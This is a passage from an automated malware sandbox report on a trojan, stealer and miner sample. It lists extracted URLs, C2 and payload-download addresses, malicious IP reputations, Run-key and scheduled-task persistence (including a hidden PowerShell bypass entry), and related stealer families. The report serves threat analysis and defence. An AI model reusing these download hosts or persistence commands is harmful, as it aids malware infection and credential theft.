                                                                                                            http://185.156.73.23/dll/keyd5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://185.215.113.16/off/def.exeea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://discokeyus.lat:443/apiea17d0b77a.exe, 0000002F.00000003.3475247118.00000000010E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://html4/loose.dtd352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://185.215.113.206/68b591d6548ec281/vcruntime140.dll9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://ocsp.sectigo.com0c359af6492.exe.14.drfalse
                                                                                                                          high
                                                                                                                          http://185.215.113.16/mine/random.exe9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://185.215.113.16/mine/random.exeT9434b989db.exe, 00000030.00000002.4214117571.00000000007A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://discokeyus.lat/apiea17d0b77a.exe, 0000002F.00000003.3474594016.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421003760.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.000000000108C000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355441716.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504377940.000000000599C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3464019441.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3464019441.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3474594016.0000000005989000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421454526.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504078369.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3314582270.0000000005989000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3533335417.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3390597746.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3358345765.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3422664576.0000000005996000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3537566773.0000000001108000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3396433955.0000000005992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://185.215.113.206/68b591d6548ec281/sqlite3.dll9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://.css352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://185.215.113.206c4becf79229cb002.phpge9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://discokeyus.lat/=Gea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://185.215.113.206/c4becf79229cb002.phpx9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://185.215.113.16/aMohea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0c359af6492.exe.14.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://185.156.73.23/files/download=%Zd5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://x1.c.lencr.org/0ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://x1.i.lencr.org/0ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://185.215.113.206/68b591d6548ec281/mozglue.dll9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allea17d0b77a.exe, 0000002F.00000003.3358748084.0000000005AAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://.jpg352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://crl.micro8ea17d0b77a.exe, 0000002F.00000003.3503997226.00000000010DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.mozilla.orea17d0b77a.exe, 0000002F.00000003.3358203921.00000000059B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://185.156.73.23/dll/keybnZd5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://185.215.113.206/68b591d6548ec281/nss3.dll5G9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://185.215.113.206/c4becf79229cb002.phpge9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://sectigo.com/CPS0c359af6492.exe.14.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://185.156.73.23/files/download(hod5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://curl.se/docs/http-cookies.html352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://185.215.113.206/68b591d6548ec281/msvcp140.dll9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://xmrig.com/wizard%sIntel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://185.215.113.16/steam/random.exeea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://185.156.73.23/add?substr=mixtwo&s=three&sub=empaKd5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://185.156.73.23/soft/downloadd5cd5e4aa8.exe, 0000002E.00000002.4041645751.000000000567C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864020294.000000000595C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://185.215.113.16/steam/random.exe:ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://httpbin.org/ip352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://185.215.113.16/VBea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://185.215.113.16/ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://185.156.73.23/dll/downloadd5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://discokeyus.lat/ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3356315250.0000000005999000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3538247582.000000000599D000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3537566773.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355441716.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355493240.0000000005997000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504377940.000000000599C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3533335417.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504078369.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3471828382.00000000010F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://xmrig.com/docs/algorithmsIntel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://usbtor.ru/viewtopic.php?t=798)Zc359af6492.exe, 00000010.00000000.2914213620.0000000000423000.00000002.00000001.01000000.0000000B.sdmp, c359af6492.exe.14.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://185.215.113.2069434b989db.exe, 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            185.215.113.43
                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                            185.121.15.192
                                                                                                                                                                                                                            unknownSpain
                                                                                                                                                                                                                            207046REDSERVICIOESfalse
                                                                                                                                                                                                                            1.1.1.1
                                                                                                                                                                                                                            unknownAustralia
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            34.226.108.155
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                                                                                                            185.156.73.23
                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                            48817RELDAS-NETRUfalse
                                                                                                                                                                                                                            185.215.113.206
                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                            185.215.113.16
                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                            172.67.197.170
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            31.41.244.11
                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                            61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                            127.1.10.1
                                                                                                                                                                                                                            unknownunknown
                                                                                                                                                                                                                            unknownunknowntrue
                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1579075
                                                                                                                                                                                                                            Start date and time:2024-12-20 19:11:08 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 19m 47s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:49
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Sample name:file.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.mine.winEXE@84/46@0/11
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 57.1%
                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                            • Execution Graph export aborted for target explorer.exe, PID 6432 because there are no executed function
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                            • VT rate limit hit for: file.exe
                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            13:13:01API Interceptor11020453x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                            13:13:30API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            13:13:48API Interceptor98x Sleep call for process: ea17d0b77a.exe modified
                                                                                                                                                                                                                            13:13:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exe C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe
                                                                                                                                                                                                                            13:14:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9434b989db.exe C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe
                                                                                                                                                                                                                            13:14:03API Interceptor930230x Sleep call for process: 352def4414.exe modified
                                                                                                                                                                                                                            13:14:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exe C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe
                                                                                                                                                                                                                            13:14:12API Interceptor113367x Sleep call for process: d5cd5e4aa8.exe modified
                                                                                                                                                                                                                            13:14:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exe C:\Users\user\AppData\Local\Temp\1018752001\ceb22082b1.exe
                                                                                                                                                                                                                            13:14:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exe C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe
                                                                                                                                                                                                                            13:14:30API Interceptor228996x Sleep call for process: 9434b989db.exe modified
                                                                                                                                                                                                                            13:14:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9434b989db.exe C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe
                                                                                                                                                                                                                            13:14:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exe C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe
                                                                                                                                                                                                                            13:14:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exe C:\Users\user\AppData\Local\Temp\1018752001\ceb22082b1.exe
                                                                                                                                                                                                                            13:16:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 6e9935f194.exe C:\Users\user\AppData\Local\Temp\1018766001\6e9935f194.exe
                                                                                                                                                                                                                            13:17:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 44a5f32284.exe C:\Users\user\AppData\Local\Temp\1018767001\44a5f32284.exe
                                                                                                                                                                                                                            13:17:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9d2433b964.exe C:\Users\user\AppData\Local\Temp\1018768001\9d2433b964.exe
                                                                                                                                                                                                                            13:17:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 903f701d4b.exe C:\Users\user\AppData\Local\Temp\1018769001\903f701d4b.exe
                                                                                                                                                                                                                            13:17:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run IEUpdate powershell -ex bypass -w hidden
                                                                                                                                                                                                                            13:17:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 6e9935f194.exe C:\Users\user\AppData\Local\Temp\1018766001\6e9935f194.exe
                                                                                                                                                                                                                            13:17:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 44a5f32284.exe C:\Users\user\AppData\Local\Temp\1018767001\44a5f32284.exe
                                                                                                                                                                                                                            13:17:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9d2433b964.exe C:\Users\user\AppData\Local\Temp\1018768001\9d2433b964.exe
                                                                                                                                                                                                                            13:18:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 903f701d4b.exe C:\Users\user\AppData\Local\Temp\1018769001\903f701d4b.exe
                                                                                                                                                                                                                            13:18:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run IEUpdate powershell -ex bypass -w hidden
                                                                                                                                                                                                                            19:12:11Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            19:13:27Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                            19:15:47Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            185.215.113.43file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            R2CgZG545D.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            UyiH4t5dph.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            185.121.15.192t3VyxF5MmA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                                                                                                                                                                                                            Pm81aa8zii.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
